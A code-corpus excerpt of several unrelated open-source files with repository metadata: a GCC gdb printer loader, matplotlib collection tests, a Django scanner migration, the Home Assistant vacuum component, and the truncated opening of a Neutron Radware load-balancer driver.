#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
pythondir = '/Users/build/work/GCC-7-build/install-native/share/gcc-arm-none-eabi'
libdir = '/Users/build/work/GCC-7-build/install-native/arm-none-eabi/lib/thumb/v7-ar'
# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
# Update module path. We want to find the relative path from libdir
# to pythondir, and then we want to apply that relative path to the
# directory holding the objfile with which this file is associated.
# This preserves relocatability of the gcc tree.
# Do a simple normalization that removes duplicate separators.
pythondir = os.path.normpath (pythondir)
libdir = os.path.normpath (libdir)
prefix = os.path.commonprefix ([libdir, pythondir])
# In some bizarre configuration we might have found a match in the
# middle of a directory name.
if prefix[-1] != '/':
prefix = os.path.dirname (prefix) + '/'
# Strip off the prefix.
pythondir = pythondir[len (prefix):]
libdir = libdir[len (prefix):]
# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
|
jocelynmass/nrf51
|
toolchain/arm_cm0/arm-none-eabi/lib/thumb/v7-ar/libstdc++.a-gdb.py
|
Python
|
gpl-2.0
| 2,483 | 0.006444 |
"""
Tests specific to the collections module.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
import io
from nose.tools import assert_equal
import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from nose.plugins.skip import SkipTest
import matplotlib.pyplot as plt
import matplotlib.collections as mcollections
import matplotlib.transforms as mtransforms
from matplotlib.collections import Collection, EventCollection
from matplotlib.testing.decorators import cleanup, image_comparison
def generate_EventCollection_plot():
'''
generate the initial collection and plot it
'''
positions = np.array([0., 1., 2., 3., 5., 8., 13., 21.])
extra_positions = np.array([34., 55., 89.])
orientation = 'horizontal'
lineoffset = 1
linelength = .5
linewidth = 2
color = [1, 0, 0, 1]
linestyle = 'solid'
antialiased = True
coll = EventCollection(positions,
orientation=orientation,
lineoffset=lineoffset,
linelength=linelength,
linewidth=linewidth,
color=color,
linestyle=linestyle,
antialiased=antialiased
)
fig = plt.figure()
splt = fig.add_subplot(1, 1, 1)
splt.add_collection(coll)
splt.set_title('EventCollection: default')
props = {'positions': positions,
'extra_positions': extra_positions,
'orientation': orientation,
'lineoffset': lineoffset,
'linelength': linelength,
'linewidth': linewidth,
'color': color,
'linestyle': linestyle,
'antialiased': antialiased
}
splt.set_xlim(-1, 22)
splt.set_ylim(0, 2)
return splt, coll, props
@image_comparison(baseline_images=['EventCollection_plot__default'])
def test__EventCollection__get_segments():
'''
check to make sure the default segments have the correct coordinates
'''
_, coll, props = generate_EventCollection_plot()
check_segments(coll,
props['positions'],
props['linelength'],
props['lineoffset'],
props['orientation'])
@cleanup
def test__EventCollection__get_positions():
'''
check to make sure the default positions match the input positions
'''
_, coll, props = generate_EventCollection_plot()
np.testing.assert_array_equal(props['positions'], coll.get_positions())
@cleanup
def test__EventCollection__get_orientation():
'''
check to make sure the default orientation matches the input
orientation
'''
_, coll, props = generate_EventCollection_plot()
assert_equal(props['orientation'], coll.get_orientation())
@cleanup
def test__EventCollection__is_horizontal():
'''
check to make sure the default orientation matches the input
orientation
'''
_, coll, _ = generate_EventCollection_plot()
assert_equal(True, coll.is_horizontal())
@cleanup
def test__EventCollection__get_linelength():
'''
check to make sure the default linelength matches the input linelength
'''
_, coll, props = generate_EventCollection_plot()
assert_equal(props['linelength'], coll.get_linelength())
@cleanup
def test__EventCollection__get_lineoffset():
'''
check to make sure the default lineoffset matches the input lineoffset
'''
_, coll, props = generate_EventCollection_plot()
assert_equal(props['lineoffset'], coll.get_lineoffset())
@cleanup
def test__EventCollection__get_linestyle():
'''
check to make sure the default linestyle matches the input linestyle
'''
_, coll, _ = generate_EventCollection_plot()
assert_equal(coll.get_linestyle(), [(None, None)])
@cleanup
def test__EventCollection__get_color():
'''
check to make sure the default color matches the input color
'''
_, coll, props = generate_EventCollection_plot()
np.testing.assert_array_equal(props['color'], coll.get_color())
check_allprop_array(coll.get_colors(), props['color'])
@image_comparison(baseline_images=['EventCollection_plot__set_positions'])
def test__EventCollection__set_positions():
'''
check to make sure set_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'], props['extra_positions']])
coll.set_positions(new_positions)
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll, new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: set_positions')
splt.set_xlim(-1, 90)
@image_comparison(baseline_images=['EventCollection_plot__add_positions'])
def test__EventCollection__add_positions():
'''
check to make sure add_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'],
props['extra_positions'][0]])
coll.add_positions(props['extra_positions'][0])
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: add_positions')
splt.set_xlim(-1, 35)
@image_comparison(baseline_images=['EventCollection_plot__append_positions'])
def test__EventCollection__append_positions():
'''
check to make sure append_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'],
props['extra_positions'][2]])
coll.append_positions(props['extra_positions'][2])
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: append_positions')
splt.set_xlim(-1, 90)
@image_comparison(baseline_images=['EventCollection_plot__extend_positions'])
def test__EventCollection__extend_positions():
'''
check to make sure extend_positions works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_positions = np.hstack([props['positions'],
props['extra_positions'][1:]])
coll.extend_positions(props['extra_positions'][1:])
np.testing.assert_array_equal(new_positions, coll.get_positions())
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: extend_positions')
splt.set_xlim(-1, 90)
@image_comparison(baseline_images=['EventCollection_plot__switch_orientation'])
def test__EventCollection__switch_orientation():
'''
check to make sure switch_orientation works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_orientation = 'vertical'
coll.switch_orientation()
assert_equal(new_orientation, coll.get_orientation())
assert_equal(False, coll.is_horizontal())
new_positions = coll.get_positions()
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'], new_orientation)
splt.set_title('EventCollection: switch_orientation')
splt.set_ylim(-1, 22)
splt.set_xlim(0, 2)
@image_comparison(
baseline_images=['EventCollection_plot__switch_orientation__2x'])
def test__EventCollection__switch_orientation_2x():
'''
check to make sure calling switch_orientation twice sets the
orientation back to the default
'''
splt, coll, props = generate_EventCollection_plot()
coll.switch_orientation()
coll.switch_orientation()
new_positions = coll.get_positions()
assert_equal(props['orientation'], coll.get_orientation())
assert_equal(True, coll.is_horizontal())
np.testing.assert_array_equal(props['positions'], new_positions)
check_segments(coll,
new_positions,
props['linelength'],
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: switch_orientation 2x')
@image_comparison(baseline_images=['EventCollection_plot__set_orientation'])
def test__EventCollection__set_orientation():
'''
check to make sure set_orientation works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_orientation = 'vertical'
coll.set_orientation(new_orientation)
assert_equal(new_orientation, coll.get_orientation())
assert_equal(False, coll.is_horizontal())
check_segments(coll,
props['positions'],
props['linelength'],
props['lineoffset'],
new_orientation)
splt.set_title('EventCollection: set_orientation')
splt.set_ylim(-1, 22)
splt.set_xlim(0, 2)
@image_comparison(baseline_images=['EventCollection_plot__set_linelength'])
def test__EventCollection__set_linelength():
'''
check to make sure set_linelength works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_linelength = 15
coll.set_linelength(new_linelength)
assert_equal(new_linelength, coll.get_linelength())
check_segments(coll,
props['positions'],
new_linelength,
props['lineoffset'],
props['orientation'])
splt.set_title('EventCollection: set_linelength')
splt.set_ylim(-20, 20)
@image_comparison(baseline_images=['EventCollection_plot__set_lineoffset'])
def test__EventCollection__set_lineoffset():
'''
check to make sure set_lineoffset works properly
'''
splt, coll, props = generate_EventCollection_plot()
new_lineoffset = -5.
coll.set_lineoffset(new_lineoffset)
assert_equal(new_lineoffset, coll.get_lineoffset())
check_segments(coll,
props['positions'],
props['linelength'],
new_lineoffset,
props['orientation'])
splt.set_title('EventCollection: set_lineoffset')
splt.set_ylim(-6, -4)
@image_comparison(baseline_images=['EventCollection_plot__set_linestyle'])
def test__EventCollection__set_linestyle():
'''
check to make sure set_linestyle works properly
'''
splt, coll, _ = generate_EventCollection_plot()
new_linestyle = 'dashed'
coll.set_linestyle(new_linestyle)
assert_equal(coll.get_linestyle(), [(0, (6.0, 6.0))])
splt.set_title('EventCollection: set_linestyle')
@image_comparison(baseline_images=['EventCollection_plot__set_ls_dash'],
remove_text=True)
def test__EventCollection__set_linestyle_single_dash():
'''
check to make sure set_linestyle accepts a single dash pattern
'''
splt, coll, _ = generate_EventCollection_plot()
new_linestyle = (0, (6., 6.))
coll.set_linestyle(new_linestyle)
assert_equal(coll.get_linestyle(), [(0, (6.0, 6.0))])
splt.set_title('EventCollection: set_linestyle')
@image_comparison(baseline_images=['EventCollection_plot__set_linewidth'])
def test__EventCollection__set_linewidth():
'''
check to make sure set_linestyle works properly
'''
splt, coll, _ = generate_EventCollection_plot()
new_linewidth = 5
coll.set_linewidth(new_linewidth)
assert_equal(coll.get_linewidth(), new_linewidth)
splt.set_title('EventCollection: set_linewidth')
@image_comparison(baseline_images=['EventCollection_plot__set_color'])
def test__EventCollection__set_color():
'''
check to make sure set_color works properly
'''
splt, coll, _ = generate_EventCollection_plot()
new_color = np.array([0, 1, 1, 1])
coll.set_color(new_color)
np.testing.assert_array_equal(new_color, coll.get_color())
check_allprop_array(coll.get_colors(), new_color)
splt.set_title('EventCollection: set_color')
def check_segments(coll, positions, linelength, lineoffset, orientation):
'''
check to make sure all values in the segment are correct, given a
particular set of inputs
note: this is not a test, it is used by tests
'''
segments = coll.get_segments()
if (orientation.lower() == 'horizontal'
or orientation.lower() == 'none' or orientation is None):
# if horizontal, the position in is in the y-axis
pos1 = 1
pos2 = 0
elif orientation.lower() == 'vertical':
# if vertical, the position in is in the x-axis
pos1 = 0
pos2 = 1
else:
raise ValueError("orientation must be 'horizontal' or 'vertical'")
# test to make sure each segment is correct
for i, segment in enumerate(segments):
assert_equal(segment[0, pos1], lineoffset + linelength / 2.)
assert_equal(segment[1, pos1], lineoffset - linelength / 2.)
assert_equal(segment[0, pos2], positions[i])
assert_equal(segment[1, pos2], positions[i])
def check_allprop(values, target):
'''
check to make sure all values match the given target
note: this is not a test, it is used by tests
'''
for value in values:
assert_equal(value, target)
def check_allprop_array(values, target):
'''
check to make sure all values match the given target if arrays
note: this is not a test, it is used by tests
'''
for value in values:
np.testing.assert_array_equal(value, target)
def test_null_collection_datalim():
col = mcollections.PathCollection([])
col_data_lim = col.get_datalim(mtransforms.IdentityTransform())
assert_array_equal(col_data_lim.get_points(),
mtransforms.Bbox.null().get_points())
@cleanup
def test_add_collection():
# Test if data limits are unchanged by adding an empty collection.
# Github issue #1490, pull #1497.
plt.figure()
ax = plt.axes()
coll = ax.scatter([0, 1], [0, 1])
ax.add_collection(coll)
bounds = ax.dataLim.bounds
coll = ax.scatter([], [])
assert_equal(ax.dataLim.bounds, bounds)
@cleanup
def test_quiver_limits():
ax = plt.axes()
x, y = np.arange(8), np.arange(10)
data = u = v = np.linspace(0, 10, 80).reshape(10, 8)
q = plt.quiver(x, y, u, v)
assert_equal(q.get_datalim(ax.transData).bounds, (0., 0., 7., 9.))
plt.figure()
ax = plt.axes()
x = np.linspace(-5, 10, 20)
y = np.linspace(-2, 4, 10)
y, x = np.meshgrid(y, x)
trans = mtransforms.Affine2D().translate(25, 32) + ax.transData
plt.quiver(x, y, np.sin(x), np.cos(y), transform=trans)
assert_equal(ax.dataLim.bounds, (20.0, 30.0, 15.0, 6.0))
@cleanup
def test_barb_limits():
ax = plt.axes()
x = np.linspace(-5, 10, 20)
y = np.linspace(-2, 4, 10)
y, x = np.meshgrid(y, x)
trans = mtransforms.Affine2D().translate(25, 32) + ax.transData
plt.barbs(x, y, np.sin(x), np.cos(y), transform=trans)
# The calculated bounds are approximately the bounds of the original data,
# this is because the entire path is taken into account when updating the
# datalim.
assert_array_almost_equal(ax.dataLim.bounds, (20, 30, 15, 6),
decimal=1)
@image_comparison(baseline_images=['EllipseCollection_test_image'],
extensions=['png'],
remove_text=True)
def test_EllipseCollection():
# Test basic functionality
fig, ax = plt.subplots()
x = np.arange(4)
y = np.arange(3)
X, Y = np.meshgrid(x, y)
XY = np.vstack((X.ravel(), Y.ravel())).T
ww = X/float(x[-1])
hh = Y/float(y[-1])
aa = np.ones_like(ww) * 20 # first axis is 20 degrees CCW from x axis
ec = mcollections.EllipseCollection(ww, hh, aa,
units='x',
offsets=XY,
transOffset=ax.transData,
facecolors='none')
ax.add_collection(ec)
ax.autoscale_view()
@image_comparison(baseline_images=['polycollection_close'],
extensions=['png'], remove_text=True)
def test_polycollection_close():
from mpl_toolkits.mplot3d import Axes3D
vertsQuad = [
[[0., 0.], [0., 1.], [1., 1.], [1., 0.]],
[[0., 1.], [2., 3.], [2., 2.], [1., 1.]],
[[2., 2.], [2., 3.], [4., 1.], [3., 1.]],
[[3., 0.], [3., 1.], [4., 1.], [4., 0.]]]
fig = plt.figure()
ax = Axes3D(fig)
colors = ['r', 'g', 'b', 'y', 'k']
zpos = list(range(5))
poly = mcollections.PolyCollection(
vertsQuad * len(zpos), linewidth=0.25)
poly.set_alpha(0.7)
# need to have a z-value for *each* polygon = element!
zs = []
cs = []
for z, c in zip(zpos, colors):
zs.extend([z] * len(vertsQuad))
cs.extend([c] * len(vertsQuad))
poly.set_color(cs)
ax.add_collection3d(poly, zs=zs, zdir='y')
# axis limit settings:
ax.set_xlim3d(0, 4)
ax.set_zlim3d(0, 3)
ax.set_ylim3d(0, 4)
@image_comparison(baseline_images=['regularpolycollection_rotate'],
extensions=['png'], remove_text=True)
def test_regularpolycollection_rotate():
xx, yy = np.mgrid[:10, :10]
xy_points = np.transpose([xx.flatten(), yy.flatten()])
rotations = np.linspace(0, 2*np.pi, len(xy_points))
fig, ax = plt.subplots()
for xy, alpha in zip(xy_points, rotations):
col = mcollections.RegularPolyCollection(
4, sizes=(100,), rotation=alpha,
offsets=xy, transOffset=ax.transData)
ax.add_collection(col, autolim=True)
ax.autoscale_view()
@image_comparison(baseline_images=['regularpolycollection_scale'],
extensions=['png'], remove_text=True)
def test_regularpolycollection_scale():
# See issue #3860
class SquareCollection(mcollections.RegularPolyCollection):
def __init__(self, **kwargs):
super(SquareCollection, self).__init__(
4, rotation=np.pi/4., **kwargs)
def get_transform(self):
"""Return transform scaling circle areas to data space."""
ax = self.axes
pts2pixels = 72.0 / ax.figure.dpi
scale_x = pts2pixels * ax.bbox.width / ax.viewLim.width
scale_y = pts2pixels * ax.bbox.height / ax.viewLim.height
return mtransforms.Affine2D().scale(scale_x, scale_y)
fig, ax = plt.subplots()
xy = [(0, 0)]
# Unit square has a half-diagonal of `1 / sqrt(2)`, so `pi * r**2`
# equals...
circle_areas = [np.pi / 2]
squares = SquareCollection(sizes=circle_areas, offsets=xy,
transOffset=ax.transData)
ax.add_collection(squares, autolim=True)
ax.axis([-1, 1, -1, 1])
@cleanup
def test_picking():
fig, ax = plt.subplots()
col = ax.scatter([0], [0], [1000], picker=True)
fig.savefig(io.BytesIO(), dpi=fig.dpi)
class MouseEvent(object):
pass
event = MouseEvent()
event.x = 325
event.y = 240
found, indices = col.contains(event)
assert found
assert_array_equal(indices['ind'], [0])
@cleanup
def test_linestyle_single_dashes():
plt.scatter([0, 1, 2], [0, 1, 2], linestyle=(0., [2., 2.]))
plt.draw()
@image_comparison(baseline_images=['size_in_xy'], remove_text=True,
extensions=['png'])
def test_size_in_xy():
fig, ax = plt.subplots()
widths, heights, angles = (10, 10), 10, 0
widths = 10, 10
coords = [(10, 10), (15, 15)]
e = mcollections.EllipseCollection(
widths, heights, angles,
units='xy',
offsets=coords,
transOffset=ax.transData)
ax.add_collection(e)
ax.set_xlim(0, 30)
ax.set_ylim(0, 30)
@cleanup
def test_pandas_indexing():
try:
import pandas as pd
except ImportError:
raise SkipTest("Pandas not installed")
# Should not fail break when faced with a
# non-zero indexed series
index = [11, 12, 13]
ec = fc = pd.Series(['red', 'blue', 'green'], index=index)
lw = pd.Series([1, 2, 3], index=index)
ls = pd.Series(['solid', 'dashed', 'dashdot'], index=index)
aa = pd.Series([True, False, True], index=index)
Collection(edgecolors=ec)
Collection(facecolors=fc)
Collection(linewidths=lw)
Collection(linestyles=ls)
Collection(antialiaseds=aa)
@cleanup(style='default')
def test_lslw_bcast():
col = mcollections.PathCollection([])
col.set_linestyles(['-', '-'])
col.set_linewidths([1, 2, 3])
assert col.get_linestyles() == [(None, None)] * 6
assert col.get_linewidths() == [1, 2, 3] * 2
col.set_linestyles(['-', '-', '-'])
assert col.get_linestyles() == [(None, None)] * 3
assert col.get_linewidths() == [1, 2, 3]
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
|
unnikrishnankgs/va
|
venv/lib/python3.5/site-packages/matplotlib/tests/test_collections.py
|
Python
|
bsd-2-clause
| 21,429 | 0 |
# Generated by Django 2.2.6 on 2019-10-23 09:06
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import olympia.amo.models
class Migration(migrations.Migration):
dependencies = [
('scanners', '0008_auto_20191021_1718'),
]
operations = [
migrations.CreateModel(
name='ScannerMatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(blank=True, default=django.utils.timezone.now, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
('result', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='scanners.ScannerResult')),
('rule', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='scanners.ScannerRule')),
],
options={
'get_latest_by': 'created',
'abstract': False,
'base_manager_name': 'objects',
},
bases=(olympia.amo.models.SearchMixin, olympia.amo.models.SaveUpdateMixin, models.Model),
),
migrations.AddField(
model_name='scannerresult',
name='matched_rules',
field=models.ManyToManyField(through='scanners.ScannerMatch', to='scanners.ScannerRule'),
),
]
|
bqbn/addons-server
|
src/olympia/scanners/migrations/0009_auto_20191023_0906.py
|
Python
|
bsd-3-clause
| 1,450 | 0.004138 |
"""Support for vacuum cleaner robots (botvacs)."""
from dataclasses import dataclass
from datetime import timedelta
from functools import partial
import logging
from typing import final
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ( # noqa: F401 # STATE_PAUSED/IDLE are API
ATTR_BATTERY_LEVEL,
ATTR_COMMAND,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_IDLE,
STATE_ON,
STATE_PAUSED,
)
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
make_entity_service_schema,
)
from homeassistant.helpers.entity import (
Entity,
EntityDescription,
ToggleEntity,
ToggleEntityDescription,
)
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.icon import icon_for_battery_level
from homeassistant.helpers.typing import ConfigType
from homeassistant.loader import bind_hass
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DOMAIN = "vacuum"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
SCAN_INTERVAL = timedelta(seconds=20)
ATTR_BATTERY_ICON = "battery_icon"
ATTR_CLEANED_AREA = "cleaned_area"
ATTR_FAN_SPEED = "fan_speed"
ATTR_FAN_SPEED_LIST = "fan_speed_list"
ATTR_PARAMS = "params"
ATTR_STATUS = "status"
SERVICE_CLEAN_SPOT = "clean_spot"
SERVICE_LOCATE = "locate"
SERVICE_RETURN_TO_BASE = "return_to_base"
SERVICE_SEND_COMMAND = "send_command"
SERVICE_SET_FAN_SPEED = "set_fan_speed"
SERVICE_START_PAUSE = "start_pause"
SERVICE_START = "start"
SERVICE_PAUSE = "pause"
SERVICE_STOP = "stop"
STATE_CLEANING = "cleaning"
STATE_DOCKED = "docked"
STATE_RETURNING = "returning"
STATE_ERROR = "error"
STATES = [STATE_CLEANING, STATE_DOCKED, STATE_RETURNING, STATE_ERROR]
DEFAULT_NAME = "Vacuum cleaner robot"
SUPPORT_TURN_ON = 1
SUPPORT_TURN_OFF = 2
SUPPORT_PAUSE = 4
SUPPORT_STOP = 8
SUPPORT_RETURN_HOME = 16
SUPPORT_FAN_SPEED = 32
SUPPORT_BATTERY = 64
SUPPORT_STATUS = 128
SUPPORT_SEND_COMMAND = 256
SUPPORT_LOCATE = 512
SUPPORT_CLEAN_SPOT = 1024
SUPPORT_MAP = 2048
SUPPORT_STATE = 4096
SUPPORT_START = 8192
@bind_hass
def is_on(hass, entity_id):
"""Return if the vacuum is on based on the statemachine."""
return hass.states.is_state(entity_id, STATE_ON)
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the vacuum component."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
component.async_register_entity_service(SERVICE_TURN_ON, {}, "async_turn_on")
component.async_register_entity_service(SERVICE_TURN_OFF, {}, "async_turn_off")
component.async_register_entity_service(SERVICE_TOGGLE, {}, "async_toggle")
component.async_register_entity_service(
SERVICE_START_PAUSE, {}, "async_start_pause"
)
component.async_register_entity_service(SERVICE_START, {}, "async_start")
component.async_register_entity_service(SERVICE_PAUSE, {}, "async_pause")
component.async_register_entity_service(
SERVICE_RETURN_TO_BASE, {}, "async_return_to_base"
)
component.async_register_entity_service(SERVICE_CLEAN_SPOT, {}, "async_clean_spot")
component.async_register_entity_service(SERVICE_LOCATE, {}, "async_locate")
component.async_register_entity_service(SERVICE_STOP, {}, "async_stop")
component.async_register_entity_service(
SERVICE_SET_FAN_SPEED,
{vol.Required(ATTR_FAN_SPEED): cv.string},
"async_set_fan_speed",
)
component.async_register_entity_service(
SERVICE_SEND_COMMAND,
{
vol.Required(ATTR_COMMAND): cv.string,
vol.Optional(ATTR_PARAMS): vol.Any(dict, cv.ensure_list),
},
"async_send_command",
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up a config entry."""
component: EntityComponent = hass.data[DOMAIN]
return await component.async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
component: EntityComponent = hass.data[DOMAIN]
return await component.async_unload_entry(entry)
class _BaseVacuum(Entity):
"""Representation of a base vacuum.
Contains common properties and functions for all vacuum devices.
"""
@property
def supported_features(self):
"""Flag vacuum cleaner features that are supported."""
raise NotImplementedError()
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
return None
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
raise NotImplementedError()
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
return None
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
raise NotImplementedError()
@property
def capability_attributes(self):
"""Return capability attributes."""
if self.supported_features & SUPPORT_FAN_SPEED:
return {ATTR_FAN_SPEED_LIST: self.fan_speed_list}
@property
def state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = {}
if self.supported_features & SUPPORT_BATTERY:
data[ATTR_BATTERY_LEVEL] = self.battery_level
data[ATTR_BATTERY_ICON] = self.battery_icon
if self.supported_features & SUPPORT_FAN_SPEED:
data[ATTR_FAN_SPEED] = self.fan_speed
return data
def stop(self, **kwargs):
"""Stop the vacuum cleaner."""
raise NotImplementedError()
async def async_stop(self, **kwargs):
"""Stop the vacuum cleaner.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.stop, **kwargs))
def return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
raise NotImplementedError()
async def async_return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.return_to_base, **kwargs))
def clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
raise NotImplementedError()
async def async_clean_spot(self, **kwargs):
"""Perform a spot clean-up.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.clean_spot, **kwargs))
def locate(self, **kwargs):
"""Locate the vacuum cleaner."""
raise NotImplementedError()
async def async_locate(self, **kwargs):
"""Locate the vacuum cleaner.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.locate, **kwargs))
def set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
raise NotImplementedError()
async def async_set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(
partial(self.set_fan_speed, fan_speed, **kwargs)
)
def send_command(self, command, params=None, **kwargs):
"""Send a command to a vacuum cleaner."""
raise NotImplementedError()
async def async_send_command(self, command, params=None, **kwargs):
"""Send a command to a vacuum cleaner.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(
partial(self.send_command, command, params=params, **kwargs)
)
@dataclass
class VacuumEntityDescription(ToggleEntityDescription):
"""A class that describes vacuum entities."""
class VacuumEntity(_BaseVacuum, ToggleEntity):
"""Representation of a vacuum cleaner robot."""
entity_description: VacuumEntityDescription
@property
def status(self):
"""Return the status of the vacuum cleaner."""
return None
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
charging = False
if self.status is not None:
charging = "charg" in self.status.lower()
return icon_for_battery_level(
battery_level=self.battery_level, charging=charging
)
@final
@property
def state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = super().state_attributes
if self.supported_features & SUPPORT_STATUS:
data[ATTR_STATUS] = self.status
return data
def turn_on(self, **kwargs):
"""Turn the vacuum on and start cleaning."""
raise NotImplementedError()
async def async_turn_on(self, **kwargs):
"""Turn the vacuum on and start cleaning.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.turn_on, **kwargs))
def turn_off(self, **kwargs):
"""Turn the vacuum off stopping the cleaning and returning home."""
raise NotImplementedError()
async def async_turn_off(self, **kwargs):
"""Turn the vacuum off stopping the cleaning and returning home.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.turn_off, **kwargs))
def start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task."""
raise NotImplementedError()
async def async_start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(partial(self.start_pause, **kwargs))
async def async_pause(self):
"""Not supported."""
async def async_start(self):
"""Not supported."""
@dataclass
class StateVacuumEntityDescription(EntityDescription):
"""A class that describes vacuum entities."""
class StateVacuumEntity(_BaseVacuum):
"""Representation of a vacuum cleaner robot that supports states."""
entity_description: StateVacuumEntityDescription
@property
def state(self):
"""Return the state of the vacuum cleaner."""
return None
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
charging = bool(self.state == STATE_DOCKED)
return icon_for_battery_level(
battery_level=self.battery_level, charging=charging
)
def start(self):
"""Start or resume the cleaning task."""
raise NotImplementedError()
async def async_start(self):
"""Start or resume the cleaning task.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(self.start)
def pause(self):
"""Pause the cleaning task."""
raise NotImplementedError()
async def async_pause(self):
"""Pause the cleaning task.
This method must be run in the event loop.
"""
await self.hass.async_add_executor_job(self.pause)
async def async_turn_on(self, **kwargs):
"""Not supported."""
async def async_turn_off(self, **kwargs):
"""Not supported."""
async def async_toggle(self, **kwargs):
"""Not supported."""
|
rohitranjan1991/home-assistant
|
homeassistant/components/vacuum/__init__.py
|
Python
|
mit
| 11,915 | 0.000587 |
# Copyright 2013 Radware LTD.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Avishay Balderman, Radware
import base64
import copy
import httplib
import netaddr
import threading
import time
import eventlet
eventlet.monkey_patch(thread=True)
from oslo.config import cfg
from six.moves import queue as Queue
from neutron.api.v2 import attributes
from neutron.common import log as call_log
from neutron import context
from neutron.db.loadbalancer import loadbalancer_db as lb_db
from neutron.extensions import loadbalancer
from neutron.openstack.common import excutils
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
from neutron.services.loadbalancer.drivers import abstract_driver
from neutron.services.loadbalancer.drivers.radware import exceptions as r_exc
LOG = logging.getLogger(__name__)
RESP_STATUS = 0
RESP_REASON = 1
RESP_STR = 2
RESP_DATA = 3
TEMPLATE_HEADER = {'Content-Type':
'application/vnd.com.radware.vdirect.'
'template-parameters+json'}
PROVISION_HEADER = {'Content-Type':
'application/vnd.com.radware.'
'vdirect.status+json'}
CREATE_SERVICE_HEADER = {'Content-Type':
'application/vnd.com.radware.'
